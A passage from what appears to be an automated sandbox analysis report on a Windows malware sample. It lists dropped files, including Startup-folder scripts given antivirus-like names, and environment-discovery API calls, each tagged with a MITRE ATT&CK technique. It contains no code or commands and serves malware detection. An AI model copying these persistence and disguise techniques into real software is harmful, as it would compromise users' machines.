"informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"xlsrvintl.dll\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll]- [targetUID: 00000000-00005752]\n \"Antivirus.bat.bin\" has type \"DOS batch file ASCII text with very long lines (844) with CRLF line terminators\"- [targetUID: N/A]\n \"YourMom.vbs\" has type \"ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs]- [targetUID: 00000000-00005752]\n \"Antivirus3.vbs\" has type \"C source ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs]- [targetUID: 00000000-00005752]\n \"KasperskyScanner.hta\" has type \"HTML document ASCII text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta]- [targetUID: 00000000-00005752]\n \"chrmstp.exe\" has type \"ISO-8859 text with CRLF line terminators\"- [targetUID: N/A]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67AB3F4E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"YourMomIsGay.html\" has type \"HTML document ISO-8859 text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html]- [targetUID: 00000000-00005752]\n \"13312.txt\" has type \"ASCII text with very long lines (482) with CRLF line terminators\"- [targetUID: N/A]\n \"16834.txt\" has type \"ASCII text with very long lines (479) with CRLF line terminators\"- [targetUID: N/A]\n \"20119.txt\" has type \"ASCII text with very long lines (479) with CRLF line terminators\"- [targetUID: N/A]\n \"2160.txt\" has type \"ASCII text with very long lines (478) with CRLF line terminators\"- [targetUID: N/A]\n \"23110.txt\" has type \"ASCII text with very long lines (478) with CRLF line terminators\"- [targetUID: N/A]\n \"29671.txt\" has type \"ASCII text with very long lines (478) with CRLF line terminators\"- [targetUID: N/A]\n \"25939.txt\" has type \"ASCII text with very long lines (476) with CRLF line terminators\"- [targetUID: N/A]\n \"21345.txt\" has type \"ASCII text with very long lines (476) with CRLF line terminators\"- [targetUID: N/A]\n \"15186.txt\" has type \"ASCII text with very long lines (476) with CRLF line terminators\"- [targetUID: N/A]\n \"15198.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"22535.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"13101.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"28828.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"30200.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"12818.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"4528.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"10083.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"30686.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"29641.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"30976.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"13602.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"8186.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"21843.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"3433.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"8900.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"28057.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"4629.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"13313.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"2337.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"23145.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"3479.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"16866.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"7413.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"966.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"20395.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"16938.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"11706.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"15768.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"18529.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"19466.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"31311.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"19882.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"1933.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"7241.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"3417.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"26532.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"23230.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"15827.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"23453.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"18717.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"10560.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"28020.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"3324.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"1105.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"25785.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"24780.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"30853.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"19567.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"18308.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"30007.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"3537.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"3731.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"24374.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"31929.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"8004.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"8969.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"12189.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"28126.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"4048.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"29080.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"8112.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"8820.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"15014.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"17368.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"1604.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"3458.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"2223.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"22930.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"23659.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"22671.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"3863.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"880.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"261.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"32015.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"2659.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"21292.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"23539.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"29840.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"11997.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"18173.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"5508.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"654.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"1540.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"4037.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"8597.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"29684.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"5779.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"12470.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"8019.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"8684.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"29603.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"22723.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"10474.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"31129.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"23030.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"17710.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"17010.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"8129.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"11887.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"28286.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"27704.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"13139.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"10216.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"7669.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"19519.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"16964.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"3011.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"20016.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"22175.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"25426.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"3775.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"26071.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"18233.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"22968.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"3784.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"5109.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"25332.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"28935.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"9167.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"2407.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"24943.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"30212.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"16665.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"8905.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"6133.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"7050.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"355.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"836.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"24455.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"27815.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"7623.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"328.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"26823.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"9910.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"2398.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"24670.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"11372.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"30359.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"26482.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"6656.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"13604.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"5145.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"12256.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"13638.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"16414.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"28200.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"662.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"12463.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"13787.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"11193.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"25680.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"17425.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"28530.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"20256.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"14206.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"16574.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"8901.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"27545.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"3855.txt\" has type \"ASCII text with very long lines (461) with CRLF line terminators\"- [targetUID: N/A]\n \"11566.txt\" has type \"ASCII text with very long lines (461) with CRLF line terminators\"- [targetUID: N/A]\n \"6158.txt\" has type \"ASCII text with very long lines (461) with CRLF line terminators\"- [targetUID: N/A]\n \"28411.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"15681.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"1215.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"17646.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"19665.txt\" has type \"ASCII text with very long lines (459) with CRLF line terminators\"- [targetUID: N/A]\n \"4695.txt\" has type \"ASCII text with very long lines (459) with CRLF line terminators\"- [targetUID: N/A]\n \"31526.txt\" has type \"ASCII text with very long lines (459) with CRLF line terminators\"- [targetUID: N/A]\n \"13123.txt\" has type \"ASCII text with very long lines (459) with CRLF line terminators\"- [targetUID: N/A]\n \"18352.txt\" has type \"ASCII text with very long lines (459) with CRLF line terminators\"- [targetUID: N/A]\n \"11554.txt\" has type \"ASCII text with very long lines (459) with CRLF line terminators\"- [targetUID: N/A]\n \"8235.txt\" has type \"ASCII text with very long lines (458) with CRLF line terminators\"- [targetUID: N/A]\n \"12064.txt\" has type \"ASCII text with very long lines (458) with CRLF line terminators\"- [targetUID: N/A]\n \"12588.txt\" has type \"ASCII text with very long lines (458) with CRLF line terminators\"- [targetUID: N/A]\n \"22296.txt\" has type \"ASCII text with very long lines (458) with CRLF line terminators\"- [targetUID: N/A]\n \"24394.txt\" has type \"ASCII text with very long lines (457) with CRLF line terminators\"- [targetUID: N/A]\n \"20387.txt\" has type \"ASCII text with very long lines (457) with CRLF line terminators\"- [targetUID: N/A]\n \"21349.txt\" has type \"ASCII text with very long lines (457) with CRLF line terminators\"- [targetUID: N/A]\n \"24569.txt\" has type \"ASCII text with very long lines (456) with CRLF line terminators\"- [targetUID: N/A]\n \"10898.txt\" has type \"ASCII text with very long lines (456) with CRLF line terminators\"- [targetUID: N/A]\n \"6790.txt\" has type \"ASCII text with very long lines (456) with CRLF line terminators\"- [targetUID: N/A]\n \"9298.txt\" has type \"ASCII text with very long lines (455) with CRLF line terminators\"- [targetUID: N/A]\n \"9718.txt\" has type \"ASCII text with very long lines (455) with CRLF line terminators\"- [targetUID: N/A]\n \"32633.txt\" has type \"ASCII text with very long lines (455) with CRLF line terminators\"- [targetUID: N/A]\n \"30412.txt\" has type \"ASCII text with very long lines (455) with CRLF line terminators\"- [targetUID: N/A]\n \"12689.txt\" has type \"ASCII text with very long lines (455) with CRLF line terminators\"- [targetUID: N/A]\n \"20486.txt\" has type \"ASCII text with very long lines (455) with CRLF line terminators\"- [targetUID: N/A]\n \"23762.txt\" has type \"ASCII text with very long lines (452) with CRLF line terminators\"- [targetUID: N/A]\n \"6564.txt\" has type \"ASCII text with very long lines (452) with CRLF line terminators\"- [targetUID: N/A]\n \"3649.txt\" has type \"ASCII text with very long lines (451) with CRLF line terminators\"- [targetUID: N/A]\n \"Youmustread.txt\" has type \"ASCII text with no line terminators\"- [targetUID: N/A]\n \"services\" has type \"ASCII text with no line terminators\"- Location: [%WINDIR%\\System32\\drivers\\etc\\services]- [targetUID: 00000000-00005752]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000028770c00fcf64200145c3477435c3477c8f742000100000094010a00010000007cf64200935c357740833c77d4a0347755b07177c8f74200010000000100000080c00c00000000004cf642007cf64200e8f6420095e13077d1420700feffffffd4a034771bbe22750000787600000000 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300083a0d0011000011c71d0000b00b0e00c09c0d00b1080000aaa8640000200000b0080000580f00000d004200a2000000b1080000a1000000a1080000c9570000000000000000000036a8ffff5c00500000000000b1080000 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f5f63477adaa1f77f42eeb7180d10c00a035eb717daa1f77acec2c0070be0c00b2f434774daa1f77bcec2c000000e4710000e4710000000018ec2c00f0000000f000e4710000000028ec2c0053000000bced2c0000000000010000008cec2c0040f53477000000000000000078ec2c00 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007f02000000000000008c47cc73c85b13008c47cc7300000000c85b1300d4e32c00086d347718813c770000000088e42c0000000000de54a96414e42c0095e13077e9570700feffffff6b2c357731192375021000000000000000000100e8e32c00c89f34778c47cc730000000000000000 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" queries volume information of \"C:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" at 00000000-00005752-0000010C-5551084", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009d001d02000000000000000000000000000000000000140098001d0200000000000000000000086d0a0000000000200000000000000000000000804a0c00f8690a00186b0a00d0990c00c06e0a00000000008cf4420000000000e8f6420095e13077395a0700feffffffff2b34779a2a347764c57d76b69f3477000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c57d76d0990c0064c57d76 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000a000000000074010a0000000000060000000000000050010a001a000000580b0e00000000001a0000000000000014000000000000000000000000000000000000000000000002000002c09c0d00630400670000000000000000000000008000000000000000922000b240e40d000100000000000000020000000c000000689b0d00689b0d00639b0d00000000000000000000000a000000000190f62c0000000000b0fc2c0095e1307701540700feffffff435c34775059347794000000a0000000629b0d00609b0d009400000034f82c00fdfe2a760000000018000000fbfe0ceb (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"IsWow64Process\" with parameter \"5752\" - (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the 